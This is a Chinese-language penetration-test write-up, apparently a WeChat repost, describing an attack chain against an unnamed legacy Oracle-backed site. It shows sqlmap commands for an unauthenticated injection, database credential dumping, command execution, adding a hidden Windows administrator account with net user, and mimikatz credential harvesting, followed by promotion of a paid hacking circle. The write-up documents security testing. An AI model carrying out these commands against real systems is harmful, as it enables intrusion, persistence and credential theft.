声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

一

前言

这是个人认为近期比较有价值的一次渗透测试，分享给大家。

主要分为4个步骤：弱口令进入系统；后台sql注入；getshell，远程RDP管理员登录；扩大战果，证明危害。

二

弱口令

在一次针对某站点信息收集的过程中，通过子域名扫描，扫描到某个老旧系统。

一看这都2014年的老站了，肯定有搞头！

日常使用burp爆破一波试试，没爆破出来

但是随手一试，好家伙123/123进入系统，属于是运气拉满了

（高强度打码）

这里能看到是一个“编辑”人员的权限，并没有什么上传等后台管理的功能，只能耐心过一遍系统的各种功能。

三

SQL注入

进入系统翻一翻，没有什么敏感信息泄露，但是在一处查询人员信息的接口发现了SQL注入（xray被动扫描扫出来的）

http://host.com/xxx/control/SearchMenHunInfo?content=123

这时想要手工验证一下，发现甚至不需要后台cookie就能直接访问该接口，相当于还存在未授权访问漏洞。

那这sqlmap一把梭，--cookie参数都不用加了

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --current-db

这里跑出了库名，还能看到这是一个Oracle数据库。打算继续拿shell试试。

但是在我日常渗透过程中，Oracle数据库并不常见，sqlmap中--os-shell参数还是不支持Oracle数据库的，只能现学现卖一波。

四

Getshell

在一次针对某站点信息收集的过程中，通过子域名扫描，扫描到某个老旧系统

首先参考了这篇文章  Oracle注入 - 命令执行&Shell反弹

文章中介绍到以下版本的Oracle在发现注入后可以命令执行

那么再用sqlmap查看一下Oracle版本

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" -b

看来是符合可以命令执行的版本的！

又经历了一波漫长的学习，发现了github一个大佬已经集成好的工具 oracleShell oracle 数据库命令执行

工具截图如下

可以看出，我们还需要知道数据库的SID，用户名，密码，就可以尝试执行命令。

那么就继续利用sqlmap来扩大我们已知信息。

查看数据库权限--is-dba

查看数据库IP，SID

这里进入sqlmap的--sql-shell模式，用sql语句来查询

查询SID：select instance_name from v$instance

查询当前IP：select sys_context('userenv','ip_address') from dual

爆破所有数据库账号、密码

使用sqlmap的--passwords参数，跑出数据库的所用用户名和对应的密码

经过漫长的等待，终于有了结果（这里给出的是虚构的数据）

database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] HR [1]:
    password hash: 6399F3B38EDF3288
[*] SYS [1]:
    password hash: 4DE42795E66117AE
[*] SYSMAN [1]:
    password hash: B607EEBB3A2D36D0
[*] SYSTEM[1]:
    password hash: 8877FF8306EF558B
    clear-text password: SYS

可以看到有些用户名只得到了对应的哈希，但是其中一个用户名system成功跑出了明文密码！

查询Oracle常用端口

Oracle确实不熟悉，百度查一波端口：

查询发现，服务端默认的端口号一般是389，客户端默认的端口号一般都是1521

OK！现在已经拥有了IP，PORT，SID，用户名(SYSTEM)，密码(SYS)，可以直接使用工具连接了。

一切顺利！取得了system权限！

五

进一步利用

创建个用户试试

net user name pwd /add

net localgroup Administrators name /add

远程桌面RDP连接 name/pwd

连接成功！

上传一个mimikatz，抓取管理员明文密码

privilege::debug

sekurlsa::logonPasswords

最终成功登录Administrator账号RDP

至此，渗透结束。

六

总结

弱口令->sql注入->getshell->拿下管理员权限

从一个常见的弱口令，到拿下管理员权限，这个过程需要运气和耐心，把这次经历拿出来分享一下。

在强调一下本次漏洞详情均已提交，渗透需规范！

https://www.freebuf.com/articles/web/284911.html

★

付费圈子

欢 迎 加 入 星 球 ！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

群聊 | 技术交流群-群除我佬

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

原文始发于微信公众号（渗透安全团队）：实战 | 渗透从弱口令到getshell